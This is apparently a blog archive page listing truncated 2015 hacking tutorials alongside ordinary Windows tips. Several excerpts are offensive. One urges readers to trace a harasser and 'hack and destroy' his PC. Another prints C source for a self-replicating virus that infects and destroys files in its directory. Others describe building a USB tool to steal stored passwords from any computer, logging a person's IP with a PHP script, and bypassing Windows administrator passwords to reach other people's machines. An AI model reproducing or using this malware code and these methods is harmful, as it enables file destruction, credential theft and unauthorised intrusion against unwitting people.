Skip to main content

Posts

Showing posts from 2015

How To Track Anyone Online?

Tracking A Person Online. Internet is filled with people who love to annoy and give out threats. If they are careless, they can be easily tracked, but if it is a professional guy, he might be difficult to trace as he might be using proxy/anonymity tool. If you think you are in trouble, i would advise you to go to cops. But if you think it is some punk ass guy, follow this tutorial to track him down and kick his ass. To track him down, you can use mobile number, an email from him, or his Facebook ID. So lets get it started : Tracking Somebody By His Facebook ID : Facebook is full of stalkers and annoying people and fake profiles,  And there is absolutely no way to get rid of them. Sure you can ignore them, but they will start posting on your walls, block them, they will make a new ID. Only way to get rid of them is to muscle them out. And by muscle i mean hack and destroy their PC. To do that, you will need their IP Address, And This tutorial will teach you how to do it

How to Create a Computer Virus?

How to Create a Computer Virus? This program is an example of how to  create a computer virus  in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory. Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on. Here’s the source code of the virus program: #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst("*.*",&ffblk,0); //Search for a file with any extension (*.*) while(!done) { virus=fopen(_argv[0],"rb"); host=fopen(ffblk.ff_name,"rb+"); if(host==NULL) goto next

How to Hack Passwords Using a USB Drive?

How to Hack Passwords Using a USB Drive As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit: MessenPass :  Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail PassView :  Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), M

How to Find the IP Address of a Remote Computer?

How to Find the IP Address of a Remote Computer Most of you may be curious to know how to  find the IP address  of your friend’s computer or the IP of the person with whom you may be chatting. If so, then this post will surely help you out. In this post I’ll show you how to find the IP address of a remote computer in simple steps. How to Capture the IP Address? I have created a PHP script to make it easier for you to capture  the IP address of the any computer of your choice. Here is a step-by-step process to find out the IP address: Download the  IP Finder Script  (IP_Finder.ZIP) that I have created from the following link: Download the IP-Finder-Script Open a new account in  X10Hosting  (or any other free host that supports PHP). Extract the IP_Finder.ZIP file and upload the two files  ip.php  and  ip_log.txt into the root folder of your hosting account using the File Manager. You can rename the  ip.php  to any name of your choice. Set the permis

How to Make An Invisible Password Protected Folder?

How to Make An Invisible Password Protected Folder Do you want to password protect your folder? Do you want to make it invisible so that it remains unnoticed by other users of your PC? Well, here is a way to do that. In this post, I will show you how to make an  invisible password protected folder in Windows without using any additional software. How to Create a Password Protected Folder? Here is is step-by-step procedure to do this: Step-1:  Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as  ABC . Step-2:  Now, in this folder place all the important files, documents or any folders that you want to password protect. Step-3:  Right-click on this folder (ABC) and select the option  Send To  -> Compressed (zipped) Folder . Step-4:  Now a new compressed zipped folder gets created next this folder (ABC) with the same name. Step-5:  Double-click on this compressed zipped folder and you should se

How to Hack Windows Administrator Password?

How to Hack Windows Administrator Password This post will show you how to  hack Windows administrator password  at times when you forget it or when you want to gain access to a computer for which you do not know the password. Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to log in to the computer. So, if you are somewhat in a same kind of situation, here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. Hacking the Windows Admin Password: You can do this with a small tool called   Offline NT Password & Registry Editor . This utility works offline, that means you need to shut down and boot off your computer using a floppy disk, CD or USB device (such as pen drive). The tool has the following featur

How to Recover Deleted Files from Windows and Mac?

How to Recover Deleted Files from Windows and Mac \ Have you accidentally deleted your files from the hard disk? Do you desperately need to  recover the deleted files  back in the original form? Well, you need not panic! It is possible to recover the deleted files or data back from the hard disk  (even after you have Shift+Deleted)  provided you act as soon as you realize that the files are deleted and use the best deleted files recovery software. In this post you will find a detailed information on how to recover the deleted files back from your Windows PC or Mac. How Deleted File Recovery Process Works? When you delete a file from your computer, (or even from the recycle bin) the file is not actually deleted. Unlike what most people think, whenever a file or data is deleted from your computer, it is not permanently vanished or dropped out from your hard disk. Even though the files appear to have been deleted, they can still be recovered successfully. Let’s take up

How to Change the Logon Screen Background in Windows 7?

How to Change the Logon Screen Background in Windows 7 How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to change the Windows 7 logon screen and set your own picture/wallpaper as the background. Customizing the logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well, here is a step-by-step instruction to change the logon screen background: The image you need to set as the logon screen background should be a  .jpg file and its size should not exceed  245KB . The image resolution can be anything of your choice. However I prefer  1440 x 900  or  1024 x 768 . You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as  backgroundDefault.jpg . You will need to copy this image to the following location: C:\Windows\system32\oobe\info\backg
How to Customize Start Menu Button in Windows 7 Have you ever wondered to know how to customize the start menu button in Windows 7? Are you bored of seeing the same old start menu button that is there from the time of Vista? Well, it is possible to spice up your copy of Windows 7 by giving a new look to the start menu button. In this post, I will show you how to do that in an easy to follow step-by-step manner. Tools that you need: Resource Hacker Custom Start Menu icons (images). It mush be of the size  54×162  with a .bmp  extension. which looks something as follows: As shown in the above image, it must be in the following order: 1st Image:  When the button is not in use. 2nd Image:  When the mouse pointer is over the button. 3rd Image:  When the button is clicked. I have created a few customized buttons which are ready to use. You can download them from the following link: Start Menu Buttons Download Once you have all those resources ready, you